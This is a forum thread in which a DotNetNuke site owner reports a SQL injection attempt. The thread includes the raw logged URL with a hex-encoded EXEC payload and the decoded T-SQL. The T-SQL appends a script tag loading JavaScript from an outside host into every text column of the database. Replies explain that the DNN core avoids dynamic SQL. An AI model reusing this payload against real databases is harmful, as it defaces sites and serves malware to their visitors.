hello,

My website has been attacked with SQL injection stuff.
I want to know if I was LUCKY that it didn't work OR if I can sleep in peace because DNN is proof on that side...

Here is the error I got in the EVENT LOG:

AssemblyVersion: 04.08.03
PortalID: 6
PortalName: my website
UserID: -1
UserName:
ActiveTabID: 171
ActiveTabName: Home
RawURL: /LinkClick.aspx?link=237&tabid=171';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302%20AS%20CHAR(4000));EXEC(@S);
AbsoluteURL: /LinkClick.aspx
AbsoluteURLReferrer:
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; (R1 1.5))
DefaultDataProvider: DotNetNuke.Data.SqlDataProvider, DotNetNuke.SqlDataProvider
ExceptionGUID: 269dadf2-75fa-4310-af9e-5825a9aad92f
InnerException: Unhandled Error:
FileName:
FileLineNumber: 0
FileColumnNumber: 0
Method: System.Number.StringToNumber
StackTrace:
Message: System.Exception: Unhandled Error: ---> System.formatException: Input string was not in a correct format.at System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberformatInfo info, Boolean parseDecimal)at System.Number.ParseInt32(String s, NumberStyles style, NumberformatInfo info)at DotNetNuke.Services.FileSystem.FileServerHandler.ProcessRequest(HttpContext context)at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)--- End of inner exception stack trace ---
Source:
Server Name: DEDI568

I did a select of the CAST in SQL...and look what I've found...

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title>
<script src="http://www2.s800qn.cn/csrss/w.js"></script>
<!--''+['+@C+'] where '+@C+' not like ''%"></title>
<script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor    

So my website seems to be fine as all the content still the same and I don't find the .js file they tried to put...

I just want to understand WHY they fail, does DNN is proof on that side?

Thanks in advance for your answers!

Maks

The DNN core does not use ad hoc, dynamically compiled SQL, so attacks like these will not affect the core.  However, it is possible that 3rd party modules could be vulnerable to these attacks.  You'll need to make sure that you trust the vendors of your 3rd party modules in order to fully sleep in peace about SQL injection.

Hope that helps,

Recent weeks? More like months! My sites have been getting hit with this for quite a while now.